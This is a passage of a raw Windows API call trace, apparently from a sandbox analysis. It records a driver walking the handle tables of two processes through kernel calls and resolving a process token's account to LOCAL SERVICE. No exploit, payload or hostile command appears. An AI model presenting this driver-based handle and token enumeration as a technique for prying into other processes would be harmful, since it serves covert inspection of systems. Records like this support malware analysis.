(Object=0xffffe0006a269a80) returned 0x7fff [0264.910] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.910] PsReleaseProcessExitSynchronization () returned 0x2 [0264.910] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801dc [0264.910] IoCompleteRequest () returned 0x0 [0264.910] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.910] PsAcquireProcessExitSynchronization () returned 0x0 [0264.910] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.910] ObReferenceObjectByHandle (in: Handle=0x1874, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a79cdb0, HandleInformation=0x0) returned 0x0 [0264.910] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.910] PsReleaseProcessExitSynchronization () returned 0x2 [0264.910] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801db [0264.911] ObQueryNameString (in: Object=0xffffe0006a79cdb0, ObjectNameInfo=0xffffe0006a40c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a40c7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.911] ObfDereferenceObject (Object=0xffffe0006a79cdb0) returned 0x7efe [0264.911] IoCompleteRequest () returned 0x0 [0264.911] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.911] PsAcquireProcessExitSynchronization () returned 0x0 [0264.911] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.911] ObReferenceObjectByHandle (in: Handle=0x18a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a7938d0, HandleInformation=0x0) returned 0x0 [0264.911] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.911] PsReleaseProcessExitSynchronization () returned 0x2 [0264.911] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801da [0264.911] ObQueryNameString (in: Object=0xffffe0006a7938d0, ObjectNameInfo=0xffffe000690ef044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000690ef044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.911] ObfDereferenceObject (Object=0xffffe0006a7938d0) returned 0x7fd9 [0264.911] IoCompleteRequest () returned 0x0 [0264.911] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.911] PsAcquireProcessExitSynchronization () returned 0x0 [0264.911] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.911] ObReferenceObjectByHandle (in: Handle=0x18ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a922b10, HandleInformation=0x0) returned 0x0 [0264.911] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.911] PsReleaseProcessExitSynchronization () returned 0x2 [0264.911] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801d9 [0264.911] ObQueryNameString (in: Object=0xffffe0006a922b10, ObjectNameInfo=0xffffe00068a64044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a64044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.911] ObfDereferenceObject (Object=0xffffe0006a922b10) returned 0x7ffb [0264.911] IoCompleteRequest () returned 0x0 [0264.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x340) returned 0x180 [0264.911] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0264.911] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe00069851840, HandleInformation=0x0) returned 0x0 [0264.911] ObOpenObjectByPointer (in: Object=0xffffe00069851840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000d8c) returned 0x0 [0264.911] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x4806d [0264.911] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000d8c, DesiredAccess=0x8, TokenHandle=0xffffe00069bad100 | out: TokenHandle=0xffffe00069bad100*=0x1a8) returned 0x0 [0264.911] ZwClose (Handle=0xffffffff80000d8c) returned 0x0 [0264.911] IoCompleteRequest () returned 0x0 [0264.911] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0264.911] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="LOCAL SERVICE", cchName=0x14d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0264.913] CloseHandle (hObject=0x1a8) returned 1 [0264.913] CloseHandle (hObject=0x180) returned 1 [0264.913] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.913] PsAcquireProcessExitSynchronization () returned 0x0 [0264.913] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.913] ObReferenceObjectByHandle (in: Handle=0x18, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069848c90, HandleInformation=0x0) returned 0x0 [0264.913] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.913] PsReleaseProcessExitSynchronization () returned 0x2 [0264.913] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x4006b [0264.913] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a40f044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a40f044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.913] ObfDereferenceObject (Object=0xffffe00069848c90) returned 0x7fff [0264.913] IoCompleteRequest () returned 0x0 [0264.913] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.913] PsAcquireProcessExitSynchronization () returned 0x0 [0264.913] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.913] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069852300, HandleInformation=0x0) returned 0x0 [0264.913] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.913] PsReleaseProcessExitSynchronization () returned 0x2 [0264.913] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x4006a [0264.913] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe00069041044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe00069041044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.913] ObfDereferenceObject (Object=0xffffe00069852300) returned 0x7ffc [0264.913] IoCompleteRequest () returned 0x0 [0264.913] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.913] PsAcquireProcessExitSynchronization () returned 0x0 [0264.913] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.913] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069855e40, HandleInformation=0x0) returned 0x0 [0264.913] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.913] PsReleaseProcessExitSynchronization () returned 0x2 [0264.913] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40069 [0264.913] ObQueryNameString (in: Object=0xffffe00069855e40, ObjectNameInfo=0xffffe0006a4147c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4147c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.913] ObfDereferenceObject (Object=0xffffe00069855e40) returned 0x7fff [0264.914] IoCompleteRequest () returned 0x0 [0264.914] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.914] PsAcquireProcessExitSynchronization () returned 0x0 [0264.914] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.914] ObReferenceObjectByHandle (in: Handle=0x120, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069876b80, HandleInformation=0x0) returned 0x0 [0264.914] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.914] PsReleaseProcessExitSynchronization () returned 0x2 [0264.914] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40068 [0264.914] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006a44d7c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a44d7c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.914] ObfDereferenceObject (Object=0xffffe00069876b80) returned 0x7cb2 [0264.914] IoCompleteRequest () returned 0x0 [0264.914] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.914] PsAcquireProcessExitSynchronization () returned 0x0 [0264.914] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.914] ObReferenceObjectByHandle (in: Handle=0x1bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006987a570, HandleInformation=0x0) returned 0x0 [0264.914] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.914] PsReleaseProcessExitSynchronization () returned 0x2 [0264.914] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40067 [0264.914] ObQueryNameString (in: Object=0xffffe000756919d0, ObjectNameInfo=0xffffe0006a334044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a334044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.914] ObfDereferenceObject (Object=0xffffe0006987a570) returned 0x8000 [0264.914] IoCompleteRequest () returned 0x0 [0264.914] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.914] PsAcquireProcessExitSynchronization () returned 0x0 [0264.914] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.914] ObReferenceObjectByHandle (in: Handle=0x1c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069877140, HandleInformation=0x0) returned 0x0 [0264.914] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.914] PsReleaseProcessExitSynchronization () returned 0x2 [0264.914] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40066 [0264.914] ObQueryNameString (in: Object=0xffffe00069877140, ObjectNameInfo=0xffffe0006a3ae6c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3ae6c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.914] ObfDereferenceObject (Object=0xffffe00069877140) returned 0x7ffe [0264.914] IoCompleteRequest () returned 0x0 [0264.914] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.914] PsAcquireProcessExitSynchronization () returned 0x0 [0264.914] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.914] ObReferenceObjectByHandle (in: Handle=0x1c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069877660, HandleInformation=0x0) returned 0x0 [0264.914] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.914] PsReleaseProcessExitSynchronization () returned 0x2 [0264.914] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40065 [0264.914] ObQueryNameString (in: Object=0xffffe00069877660, ObjectNameInfo=0xffffe0006a3307c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3307c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.914] ObfDereferenceObject (Object=0xffffe00069877660) returned 0x7ffe [0264.914] IoCompleteRequest () returned 0x0 [0264.915] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.915] PsAcquireProcessExitSynchronization () returned 0x0 [0264.915] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.915] ObReferenceObjectByHandle (in: Handle=0x1d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069896f20, HandleInformation=0x0) returned 0x0 [0264.915] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.915] PsReleaseProcessExitSynchronization () returned 0x2 [0264.915] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40064 [0264.915] ObQueryNameString (in: Object=0xffffe00069896f20, ObjectNameInfo=0xffffe0006a331244, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a331244, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.915] ObfDereferenceObject (Object=0xffffe00069896f20) returned 0x7ffe [0264.915] IoCompleteRequest () returned 0x0 [0264.915] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.915] PsAcquireProcessExitSynchronization () returned 0x0 [0264.915] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.915] ObReferenceObjectByHandle (in: Handle=0x1f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069896920, HandleInformation=0x0) returned 0x0 [0264.915] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.915] PsReleaseProcessExitSynchronization () returned 0x2 [0264.915] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40063 [0264.915] ObQueryNameString (in: Object=0xffffe00069896920, ObjectNameInfo=0xffffe0006a33d044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a33d044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.915] ObfDereferenceObject (Object=0xffffe00069896920) returned 0x7ffe [0264.915] IoCompleteRequest () returned 0x0 [0264.915] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.915] PsAcquireProcessExitSynchronization () returned 0x0 [0264.915] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.915] ObReferenceObjectByHandle (in: Handle=0x1fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069884ab0, HandleInformation=0x0) returned 0x0 [0264.915] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.915] PsReleaseProcessExitSynchronization () returned 0x2 [0264.915] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40062 [0264.915] ObQueryNameString (in: Object=0xffffe00069884ab0, ObjectNameInfo=0xffffe0006a3f8044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f8044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.915] ObfDereferenceObject (Object=0xffffe00069884ab0) returned 0x7ffe [0264.915] IoCompleteRequest () returned 0x0 [0264.915] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.915] PsAcquireProcessExitSynchronization () returned 0x0 [0264.915] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.915] ObReferenceObjectByHandle (in: Handle=0x200, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069885ac0, HandleInformation=0x0) returned 0x0 [0264.915] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.915] PsReleaseProcessExitSynchronization () returned 0x2 [0264.915] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40061 [0264.915] ObQueryNameString (in: Object=0xffffe00069885ac0, ObjectNameInfo=0xffffe00068178044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068178044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.915] ObfDereferenceObject (Object=0xffffe00069885ac0) returned 0x7ff3 [0264.915] IoCompleteRequest () returned 0x0 [0264.915] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.915] PsAcquireProcessExitSynchronization () returned 0x0 [0264.915] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.916] ObReferenceObjectByHandle (in: Handle=0x214, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006988cf20, HandleInformation=0x0) returned 0x0 [0264.916] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.916] PsReleaseProcessExitSynchronization () returned 0x2 [0264.916] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40060 [0264.916] ObQueryNameString (in: Object=0xffffe0006988cf20, ObjectNameInfo=0xffffe00068a59684, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a59684, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.916] ObfDereferenceObject (Object=0xffffe0006988cf20) returned 0x7ff5 [0264.916] IoCompleteRequest () returned 0x0 [0264.916] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.916] PsAcquireProcessExitSynchronization () returned 0x0 [0264.916] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.916] ObReferenceObjectByHandle (in: Handle=0x230, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069890dc0, HandleInformation=0x0) returned 0x0 [0264.916] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.916] PsReleaseProcessExitSynchronization () returned 0x2 [0264.916] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x4005f [0264.916] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a816044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a816044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.916] ObfDereferenceObject (Object=0xffffe00069890dc0) returned 0x8003 [0264.916] IoCompleteRequest () returned 0x0 [0264.916] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.916] PsAcquireProcessExitSynchronization () returned 0x0 [0264.916] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.916] ObReferenceObjectByHandle (in: Handle=0x234, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006986ff20, HandleInformation=0x0) returned 0x0 [0264.916] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.916] PsReleaseProcessExitSynchronization () returned 0x2 [0264.916] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x4005e [0264.916] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe000684197c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe000684197c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.916] ObfDereferenceObject (Object=0xffffe0006986ff20) returned 0x8009 [0264.916] IoCompleteRequest () returned 0x0 [0264.916] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.916] PsAcquireProcessExitSynchronization () returned 0x0 [0264.916] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.916] ObReferenceObjectByHandle (in: Handle=0x238, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000804d4880, HandleInformation=0x0) returned 0x0 [0264.916] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.916] PsReleaseProcessExitSynchronization () returned 0x2 [0264.916] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x4005d [0264.916] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a3b4344, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3b4344, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.916] ObfDereferenceObject (Object=0xffffe000804d4880) returned 0x800f [0264.916] IoCompleteRequest () returned 0x0 [0264.916] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.916] PsAcquireProcessExitSynchronization () returned 0x0 [0264.916] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.916] ObReferenceObjectByHandle (in: Handle=0x240, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698944f0, HandleInformation=0x0) returned 0x0 [0264.916] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.916] PsReleaseProcessExitSynchronization () returned 0x2 [0264.916] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x4005c [0264.916] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe000691a37c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe000691a37c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.917] ObfDereferenceObject (Object=0xffffe000698944f0) returned 0x800b [0264.917] IoCompleteRequest () returned 0x0 [0264.917] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.917] PsAcquireProcessExitSynchronization () returned 0x0 [0264.917] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.917] ObReferenceObjectByHandle (in: Handle=0x248, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698925f0, HandleInformation=0x0) returned 0x0 [0264.917] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.917] PsReleaseProcessExitSynchronization () returned 0x2 [0264.917] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x4005b [0264.917] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a44e484, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a44e484, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.917] ObfDereferenceObject (Object=0xffffe000698925f0) returned 0x800f [0264.917] IoCompleteRequest () returned 0x0 [0264.917] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.917] PsAcquireProcessExitSynchronization () returned 0x0 [0264.917] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.917] ObReferenceObjectByHandle (in: Handle=0x24c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697ae780, HandleInformation=0x0) returned 0x0 [0264.917] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.917] PsReleaseProcessExitSynchronization () returned 0x2 [0264.917] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x4005a [0264.917] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a359444, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a359444, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.917] ObfDereferenceObject (Object=0xffffe000697ae780) returned 0x800f [0264.917] IoCompleteRequest () returned 0x0 [0264.917] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.917] PsAcquireProcessExitSynchronization () returned 0x0 [0264.917] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.917] ObReferenceObjectByHandle (in: Handle=0x250, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000804d4660, HandleInformation=0x0) returned 